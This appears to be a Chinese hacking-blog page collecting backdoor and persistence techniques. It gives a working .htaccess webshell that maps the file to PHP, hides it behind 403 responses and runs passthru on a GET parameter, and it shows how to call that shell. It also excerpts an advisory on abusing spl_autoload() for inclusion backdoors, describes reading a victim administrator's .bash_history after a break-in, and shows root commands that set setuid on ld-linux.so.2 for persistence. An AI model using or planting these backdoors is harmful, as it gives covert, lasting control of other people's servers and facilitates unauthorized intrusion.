0x50sec.org

作者:kindle

From:http://key0.cn/?p=285

万恶的引用功能，下文复制粘贴无用，请自行将双引号修改

.htaccess内容如下

#首先允许web访问这个文件
<Files ~ “^\.ht”>
Order allow,deny
Allow from all
</Files>

RedirectMatch 403 .htaccess$
#.htaccess结尾的403错误，这里是为了增加隐蔽性

AddType application/x-httpd-php .htaccess
#给.htaccess映射php拓展

### SHELL ### <?php echo “\n”;passthru($_GET['c'].” 2>&1″); ?>### KINDLE ###
#恶意的php代码

使用方法:http://localhost/.htaccess/?c=dir

在PHP 5 >= 5.1.2里出现了一个新的包含函数spl_autoload(),如果使用不当可以导致包含漏洞,或者被用来留置后门程序.
New Includes Function — spl_autoload()

author: ryat#www.wolvez.org
team:http://www.80vul.com
date:2009-04-13

一、描述

看看手册对这个函数的描述:

spl_autoload
(PHP 5 >= 5.1.2)

spl_autoload — Default implementation for __autoload()

void spl_autoload ( string $class_name [, string $file_extensions= spl_autoload_extensions() ] )

This function is intended to be used as a default implementation for __autoload(). If nothing else is specified and autoload_register() is called without any parameters then this functions will be used for any later call to __autoload().

从描述中可以知道这个函数用来替代类中__autoload方法

阅读全文…

这是一个大公司的管理员，但是一个不合格的管理员。

有一天我不小心又进去看了下，好奇管理员如何处理被入侵的服务器，就看了下管理员的.bash_history文件。


ls
cp unerrata_en.php unerrata_ch.php
cd ..
ls
cd yum/
ls
diff yum_en.php yum_ch.php
cd ..
ls
ls -ll
chown apache.apache common_ch.inc.php
阅读全文…

转自xi4oyu牛:http://hi.baidu.com/xi4oyu/blog/item/cc9741fa28f3e2106c22eb6f.html

方法一：setuid的方法，其实8是很隐蔽。看看过程:

[root@localdomain lib]# ls -l |grep ld-linux
lrwxrwxrwx 1 root root       9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
lrwxrwxrwx 1 root root      13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2
[root@localdomain lib]# chmod +s ld-linux.so.2
[root@localdomain lib]# ls -l |grep ld-2.7.so
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so
lrwxrwxrwx 1 root root       9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
[root@localdomain lib]#
我们这里给/lib/ld-linux.so.2这个文件（在FC8里，它指向ld-2.7.so这个文件）加了setuid属性。然后我们看怎么利用它。

阅读全文…